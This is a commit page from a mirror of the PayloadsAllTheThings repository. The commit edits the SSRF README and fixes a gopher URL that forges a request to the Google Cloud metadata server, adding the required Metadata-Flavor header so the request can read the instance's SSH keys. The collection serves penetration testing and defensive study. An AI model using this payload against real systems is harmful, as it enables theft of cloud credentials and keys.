wanderer/ PayloadsAllTheThings
1
0
Fork 0
mirror of https://github.com/swisskyrepo/PayloadsAllTheThings.git synced 2024-06-21 23:49:21 +02:00
Code Issues Releases Activity

Added anti-SSRF header bypass for GCP.

This commit is contained in:
mikesiegel 2019-12-31 15:11:58 +00:00
parent 7aa2761e3e
commit e024afc9f7
1 changed files with 2 additions and 1 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

3
Server Side Request Forgery/README.md
View File

@ -504,7 +504,8 @@ http://metadata.google.internal/computeMetadata/v1beta1/?recursive=true
Required headers can be set using a gopher SSRF with the following technique
```powershell
gopher://metadata.google.internal:80/xGET%20/computeMetadata/v1/instance/attributes/ssh-keys%20HTTP%2f%31%2e%31%0AHost:%20metadata.google.internal%0AAccept:%20%2a%2f%2a%0aMetadata-Flavor:%20Google%0d%0a``
gopher://metadata.google.internal:80/xGET%20/computeMetadata/v1/instance/attributes/ssh-keys%20HTTP%2f%31%2e%31%0AHost:%20metadata.google.internal%0AAccept:%20%2a%2f%2a%0aMetadata-Flavor:%20Google%0d%0a
```
Interesting files to pull out: